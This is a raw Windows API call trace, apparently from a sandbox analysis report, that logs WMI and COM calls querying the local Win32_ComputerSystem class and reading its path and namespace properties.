	[0200.579] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e260, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68c208 | out: ppvObject=0x1c68c208*=0x0) returned 0x80004002
	[0200.580] WbemLocator:IUnknown:AddRef (This=0x1b86e260) returned 0x3
	[0200.580] CoGetContextToken (in: pToken=0x1c68c0c0 | out: pToken=0x1c68c0c0) returned 0x0
	[0200.580] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e260, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c080 | out: ppvObject=0x1c68c080*=0x1b86e148) returned 0x0
	[0200.581] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b86e148, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68c0b0 | out: pCid=0x1c68c0b0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0200.581] WbemLocator:IUnknown:Release (This=0x1b86e148) returned 0x3
	[0200.581] CoGetContextToken (in: pToken=0x1c68c090 | out: pToken=0x1c68c090) returned 0x0
	[0200.581] WbemLocator:IUnknown:AddRef (This=0x1b86e260) returned 0x4
	[0200.581] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e260, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c1a8 | out: ppvObject=0x1c68c1a8*=0x1b86e230) returned 0x0
	[0200.582] WbemLocator:IUnknown:Release (This=0x1b86e260) returned 0x4
	[0200.582] WbemLocator:IRpcOptions:Query (in: This=0x1b86e230, pPrx=0x1b86e260, dwProperty=2, pdwValue=0x1c68c218 | out: pdwValue=0x1c68c218) returned 0x80004002
	[0200.582] WbemLocator:IUnknown:Release (This=0x1b86e230) returned 0x3
	[0200.582] WbemLocator:IUnknown:Release (This=0x1b86e260) returned 0x2
	[0200.583] CoGetContextToken (in: pToken=0x1c68c590 | out: pToken=0x1c68c590) returned 0x0
	[0200.583] CoGetContextToken (in: pToken=0x1c68c4d0 | out: pToken=0x1c68c4d0) returned 0x0
	[0200.583] WbemLocator:IUnknown:AddRef (This=0x1b86e260) returned 0x3
	[0200.583] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e260, riid=0x1c68c610*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c68c5f0 | out: ppvObject=0x1c68c5f0*=0x1cc3c728) returned 0x0
	[0200.583] WbemLocator:IUnknown:Release (This=0x1b86e260) returned 0x3
	[0200.583] IUnknown:Release (This=0x1cc3c728) returned 0x2
	[0200.584] IUnknown:Release (This=0x1cc3c728) returned 0x1
	[0200.584] WbemLocator:IUnknown:Release (This=0x1cc3a6e8) returned 0x2
	[0200.584] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc38280, puCount=0x1c68cbb0 | out: puCount=0x1c68cbb0*=0x2) returned 0x0
	[0200.584] WbemDefPath:IWbemPath:GetText (in: This=0x1cc38280, lFlags=4, puBuffLength=0x1c68cbb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cbb0*=0x17, pszText=0x0) returned 0x0
	[0200.584] WbemDefPath:IWbemPath:GetText (in: This=0x1cc38280, lFlags=4, puBuffLength=0x1c68cbb0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cbb0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.585] CoGetContextToken (in: pToken=0x1c68c7b0 | out: pToken=0x1c68c7b0) returned 0x0
	[0200.585] CoGetContextToken (in: pToken=0x1c68c6f0 | out: pToken=0x1c68c6f0) returned 0x0
	[0200.585] WbemLocator:IUnknown:AddRef (This=0x1b86e260) returned 0x2
	[0200.585] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e260, riid=0x1c68c830*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c68c810 | out: ppvObject=0x1c68c810*=0x1cc3c728) returned 0x0
	[0200.585] WbemLocator:IUnknown:Release (This=0x1b86e260) returned 0x2
	[0200.585] IUnknown:AddRef (This=0x1cc3c728) returned 0x3
	[0200.585] IEnumWbemClassObject:Clone (in: This=0x1cc3c728, ppEnum=0x1c68cc70 | out: ppEnum=0x1c68cc70*=0x1cc3c8b8) returned 0x0
	[0200.587] IUnknown:QueryInterface (in: This=0x1cc3c8b8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c8c8 | out: ppvObject=0x1c68c8c8*=0x1cc3c8c0) returned 0x0
	[0200.587] IClientSecurity:QueryBlanket (in: This=0x1cc3c8c0, pProxy=0x1cc3c8b8, pAuthnSvc=0x1c68c8c0, pAuthzSvc=0x1c68c8bc, pServerPrincName=0x1c68c8e8, pAuthnLevel=0x1c68c8b8, pImpLevel=0x1c68c8d4, pAuthInfo=0x1c68c8f8, pCapabilites=0x1c68c8d0 | out: pAuthnSvc=0x1c68c8c0*=0xa, pAuthzSvc=0x1c68c8bc*=0x0, pServerPrincName=0x1c68c8e8, pAuthnLevel=0x1c68c8b8*=0x6, pImpLevel=0x1c68c8d4*=0x2, pAuthInfo=0x1c68c8f8, pCapabilites=0x1c68c8d0*=0x1) returned 0x0
	[0200.587] IUnknown:Release (This=0x1cc3c8c0) returned 0x1
	[0200.587] IUnknown:QueryInterface (in: This=0x1cc3c8b8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c868 | out: ppvObject=0x1c68c868*=0x1b86e6e0) returned 0x0
	[0200.587] IUnknown:QueryInterface (in: This=0x1cc3c8b8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c7f8 | out: ppvObject=0x1c68c7f8*=0x1cc3c8c0) returned 0x0
	[0200.587] IClientSecurity:SetBlanket (This=0x1cc3c8c0, pProxy=0x1cc3c8b8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0200.589] IUnknown:Release (This=0x1cc3c8c0) returned 0x2
	[0200.589] WbemLocator:IUnknown:Release (This=0x1b86e6e0) returned 0x1
	[0200.589] CoTaskMemFree (pv=0x1b885b00) 
	[0200.590] IUnknown:QueryInterface (in: This=0x1cc3c8b8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c490 | out: ppvObject=0x1c68c490*=0x1b86e6e0) returned 0x0
	[0200.590] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e6e0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c510 | out: ppvObject=0x1c68c510*=0x0) returned 0x80004002
	[0200.591] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e6e0, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68c2a8 | out: ppvObject=0x1c68c2a8*=0x0) returned 0x80004002
	[0200.592] WbemLocator:IUnknown:AddRef (This=0x1b86e6e0) returned 0x3
	[0200.593] CoGetContextToken (in: pToken=0x1c68c160 | out: pToken=0x1c68c160) returned 0x0
	[0200.593] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e6e0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c120 | out: ppvObject=0x1c68c120*=0x1b86e5c8) returned 0x0
	[0200.593] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b86e5c8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68c150 | out: pCid=0x1c68c150*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0200.593] WbemLocator:IUnknown:Release (This=0x1b86e5c8) returned 0x3
	[0200.594] CoGetContextToken (in: pToken=0x1c68c130 | out: pToken=0x1c68c130) returned 0x0
	[0200.594] WbemLocator:IUnknown:AddRef (This=0x1b86e6e0) returned 0x4
	[0200.594] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e6e0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c248 | out: ppvObject=0x1c68c248*=0x1b86e6b0) returned 0x0
	[0200.594] WbemLocator:IUnknown:Release (This=0x1b86e6e0) returned 0x4
	[0200.595] WbemLocator:IRpcOptions:Query (in: This=0x1b86e6b0, pPrx=0x1b86e6e0, dwProperty=2, pdwValue=0x1c68c2b8 | out: pdwValue=0x1c68c2b8) returned 0x80004002
	[0200.595] WbemLocator:IUnknown:Release (This=0x1b86e6b0) returned 0x3
	[0200.595] WbemLocator:IUnknown:Release (This=0x1b86e6e0) returned 0x2
	[0200.595] CoGetContextToken (in: pToken=0x1c68c630 | out: pToken=0x1c68c630) returned 0x0
	[0200.595] CoGetContextToken (in: pToken=0x1c68c570 | out: pToken=0x1c68c570) returned 0x0
	[0200.595] WbemLocator:IUnknown:AddRef (This=0x1b86e6e0) returned 0x3
	[0200.596] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e6e0, riid=0x1c68c6b0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c68c690 | out: ppvObject=0x1c68c690*=0x1cc3c8b8) returned 0x0
	[0200.596] WbemLocator:IUnknown:Release (This=0x1b86e6e0) returned 0x3
	[0200.596] IUnknown:Release (This=0x1cc3c8b8) returned 0x2
	[0200.596] IUnknown:Release (This=0x1cc3c8b8) returned 0x1
	[0200.597] IUnknown:Release (This=0x1cc3c728) returned 0x2
	[0200.597] CoGetContextToken (in: pToken=0x1c68ca30 | out: pToken=0x1c68ca30) returned 0x0
	[0200.597] CoGetContextToken (in: pToken=0x1c68c970 | out: pToken=0x1c68c970) returned 0x0
	[0200.597] WbemLocator:IUnknown:AddRef (This=0x1b86e6e0) returned 0x2
	[0200.597] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e6e0, riid=0x1c68cab0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c68ca90 | out: ppvObject=0x1c68ca90*=0x1cc3c8b8) returned 0x0
	[0200.598] WbemLocator:IUnknown:Release (This=0x1b86e6e0) returned 0x2
	[0200.598] IUnknown:AddRef (This=0x1cc3c8b8) returned 0x3
	[0200.598] IEnumWbemClassObject:Reset (This=0x1cc3c8b8) returned 0x0
	[0200.599] IUnknown:Release (This=0x1cc3c8b8) returned 0x2
	[0200.600] CoTaskMemAlloc (cb=0x8) returned 0x1b88a2b0
	[0200.600] IEnumWbemClassObject:Next (in: This=0x1cc3c8b8, lTimeout=-1, uCount=0x1, apObjects=0x1b88a2b0, puReturned=0x1c68ccb8 | out: apObjects=0x1b88a2b0*=0x1cc3c960, puReturned=0x1c68ccb8*=0x1) returned 0x0
	[0200.746] IUnknown:QueryInterface (in: This=0x1cc3c960, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bfe0 | out: ppvObject=0x1c68bfe0*=0x1cc3c960) returned 0x0
	[0200.747] IUnknown:QueryInterface (in: This=0x1cc3c960, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c060 | out: ppvObject=0x1c68c060*=0x0) returned 0x80004002
	[0200.747] IUnknown:QueryInterface (in: This=0x1cc3c960, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68bdf8 | out: ppvObject=0x1c68bdf8*=0x0) returned 0x80004002
	[0200.749] IUnknown:AddRef (This=0x1cc3c960) returned 0x3
	[0200.749] CoGetContextToken (in: pToken=0x1c68bcb0 | out: pToken=0x1c68bcb0) returned 0x0
	[0200.749] IUnknown:QueryInterface (in: This=0x1cc3c960, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bc70 | out: ppvObject=0x1c68bc70*=0x1cc3c968) returned 0x0
	[0200.750] IMarshal:GetUnmarshalClass (in: This=0x1cc3c968, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68bca0 | out: pCid=0x1c68bca0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0200.750] IUnknown:Release (This=0x1cc3c968) returned 0x3
	[0200.750] CoGetContextToken (in: pToken=0x1c68bc80 | out: pToken=0x1c68bc80) returned 0x0
	[0200.750] IUnknown:AddRef (This=0x1cc3c960) returned 0x4
	[0200.750] IUnknown:QueryInterface (in: This=0x1cc3c960, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bd98 | out: ppvObject=0x1c68bd98*=0x0) returned 0x80004002
	[0200.750] IUnknown:Release (This=0x1cc3c960) returned 0x3
	[0200.751] IUnknown:Release (This=0x1cc3c960) returned 0x2
	[0200.751] CoGetContextToken (in: pToken=0x1c68c140 | out: pToken=0x1c68c140) returned 0x0
	[0200.751] CoGetContextToken (in: pToken=0x1c68c080 | out: pToken=0x1c68c080) returned 0x0
	[0200.751] IUnknown:AddRef (This=0x1cc3c960) returned 0x3
	[0200.751] IUnknown:QueryInterface (in: This=0x1cc3c960, riid=0x1c68c1c0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c68c1a0 | out: ppvObject=0x1c68c1a0*=0x1cc3c960) returned 0x0
	[0200.751] IUnknown:Release (This=0x1cc3c960) returned 0x3
	[0200.751] IUnknown:Release (This=0x1cc3c960) returned 0x2
	[0200.751] IUnknown:Release (This=0x1cc3c960) returned 0x1
	[0200.751] CoTaskMemFree (pv=0x1b88a2b0) 
	[0200.751] CoGetContextToken (in: pToken=0x1c68cac0 | out: pToken=0x1c68cac0) returned 0x0
	[0200.751] IUnknown:AddRef (This=0x1cc3c960) returned 0x2
	[0200.752] IWbemClassObject:Get (in: This=0x1cc3c960, wszName="__GENUS", lFlags=0, pVal=0x1c68cc30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cc2c*=0, plFlavor=0x1c68cc28*=0 | out: pVal=0x1c68cc30*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c68cc2c*=3, plFlavor=0x1c68cc28*=64) returned 0x0
	[0200.752] IWbemClassObject:Get (in: This=0x1cc3c960, wszName="__PATH", lFlags=0, pVal=0x1c68cbd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cbcc*=0, plFlavor=0x1c68cbc8*=0 | out: pVal=0x1c68cbd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c68cbcc*=8, plFlavor=0x1c68cbc8*=64) returned 0x0
	[0200.752] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0200.752] CoGetObjectContext (in: riid=0x1c68cb68*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68cb60 | out: ppv=0x1c68cb60*=0x221868) returned 0x0
	[0200.752] IComThreadingInfo:GetCurrentApartmentType (in: This=0x221868, pAptType=0x1c68cb80 | out: pAptType=0x1c68cb80*=1) returned 0x0
	[0200.752] IUnknown:QueryInterface (in: This=0x221868, riid=0x2efe148*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c68cc88 | out: ppvObject=0x1c68cc88*=0x0) returned 0x80004002
	[0200.752] IUnknown:Release (This=0x221868) returned 0x1
	[0200.753] CoGetClassObject (in: rclsid=0x2756a8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68c1f0 | out: ppv=0x1c68c1f0*=0x1cc31a60) returned 0x0
	[0200.753] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc31a60, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68bf00 | out: ppvObject=0x1c68bf00*=0x0) returned 0x80004002
	[0200.753] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1cc31a60, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bee8 | out: ppvObject=0x1c68bee8*=0x1cc35ae0) returned 0x0
	[0200.753] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc35ae0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bdf0 | out: ppvObject=0x1c68bdf0*=0x1cc35ae0) returned 0x0
	[0200.754] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc35ae0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68be70 | out: ppvObject=0x1c68be70*=0x0) returned 0x80004002
	[0200.754] WbemDefPath:IUnknown:AddRef (This=0x1cc35ae0) returned 0x3
	[0200.754] CoGetContextToken (in: pToken=0x1c68bac0 | out: pToken=0x1c68bac0) returned 0x0
	[0200.754] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc35ae0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68ba80 | out: ppvObject=0x1c68ba80*=0x1b886e90) returned 0x0
	[0200.754] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b886e90, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68bab0 | out: pCid=0x1c68bab0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0200.754] WbemDefPath:IUnknown:Release (This=0x1b886e90) returned 0x3
	[0200.755] CoGetContextToken (in: pToken=0x1c68ba90 | out: pToken=0x1c68ba90) returned 0x0
	[0200.755] WbemDefPath:IUnknown:AddRef (This=0x1cc35ae0) returned 0x4
	[0200.755] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc35ae0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bba8 | out: ppvObject=0x1c68bba8*=0x0) returned 0x80004002
	[0200.755] WbemDefPath:IUnknown:Release (This=0x1cc35ae0) returned 0x3
	[0200.755] WbemDefPath:IUnknown:Release (This=0x1cc35ae0) returned 0x2
	[0200.755] WbemDefPath:IUnknown:Release (This=0x1cc31a60) returned 0x0
	[0200.755] WbemDefPath:IUnknown:Release (This=0x1cc35ae0) returned 0x1
	[0200.756] CoGetContextToken (in: pToken=0x1c68c7c0 | out: pToken=0x1c68c7c0) returned 0x0
	[0200.756] CoGetContextToken (in: pToken=0x1c68c700 | out: pToken=0x1c68c700) returned 0x0
	[0200.756] WbemDefPath:IUnknown:AddRef (This=0x1cc35ae0) returned 0x2
	[0200.756] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc35ae0, riid=0x1c68c840*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c68c820 | out: ppvObject=0x1c68c820*=0x1cc35ae0) returned 0x0
	[0200.756] WbemDefPath:IUnknown:Release (This=0x1cc35ae0) returned 0x2
	[0200.756] WbemDefPath:IUnknown:Release (This=0x1cc35ae0) returned 0x1
	[0200.756] CoGetContextToken (in: pToken=0x1c68c940 | out: pToken=0x1c68c940) returned 0x0
	[0200.756] CoGetContextToken (in: pToken=0x1c68c880 | out: pToken=0x1c68c880) returned 0x0
	[0200.756] WbemDefPath:IUnknown:AddRef (This=0x1cc35ae0) returned 0x2
	[0200.756] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc35ae0, riid=0x1c68c9c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c68c9a0 | out: ppvObject=0x1c68c9a0*=0x1cc35ae0) returned 0x0
	[0200.757] WbemDefPath:IUnknown:Release (This=0x1cc35ae0) returned 0x2
	[0200.757] WbemDefPath:IUnknown:AddRef (This=0x1cc35ae0) returned 0x3
	[0200.757] WbemDefPath:IWbemPath:SetText (This=0x1cc35ae0, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x0
	[0200.757] WbemDefPath:IUnknown:Release (This=0x1cc35ae0) returned 0x2
	[0200.757] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc38280, puCount=0x1c68cc00 | out: puCount=0x1c68cc00*=0x2) returned 0x0
	[0200.757] WbemDefPath:IWbemPath:GetText (in: This=0x1cc38280, lFlags=4, puBuffLength=0x1c68cc00*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cc00*=0x17, pszText=0x0) returned 0x0
	[0200.757] WbemDefPath:IWbemPath:GetText (in: This=0x1cc38280, lFlags=4, puBuffLength=0x1c68cc00*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cc00*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.757] CoTaskMemAlloc (cb=0x8) returned 0x1b88a2b0
	[0200.757] IEnumWbemClassObject:Next (in: This=0x1cc3c8b8, lTimeout=-1, uCount=0x1, apObjects=0x1b88a2b0, puReturned=0x1c68ccb8 | out: apObjects=0x1b88a2b0*=0x0, puReturned=0x1c68ccb8*=0x0) returned 0x1
	[0200.899] CoTaskMemFree (pv=0x1b88a2b0) 
	[0200.899] CoGetContextToken (in: pToken=0x1c68ca40 | out: pToken=0x1c68ca40) returned 0x0
	[0200.899] WbemLocator:IUnknown:Release (This=0x1b86e6e0) returned 0x1
	[0200.899] IUnknown:Release (This=0x1cc3c8b8) returned 0x0
	[0200.901] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc38280, puCount=0x1c68cd60 | out: puCount=0x1c68cd60*=0x2) returned 0x0
	[0200.901] WbemDefPath:IWbemPath:GetText (in: This=0x1cc38280, lFlags=4, puBuffLength=0x1c68cd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cd60*=0x17, pszText=0x0) returned 0x0
	[0200.901] WbemDefPath:IWbemPath:GetText (in: This=0x1cc38280, lFlags=4, puBuffLength=0x1c68cd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.901] IWbemClassObject:Get (in: This=0x1cc3c960, wszName="__NAMESPACE", lFlags=0, pVal=0x1c68cd50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cd4c*=0, plFlavor=0x1c68cd48*=0 | out: pVal=0x1c68cd50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c68cd4c*=8, plFlavor=0x1c68cd48*=64) returned 0x0
	[0200.901] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
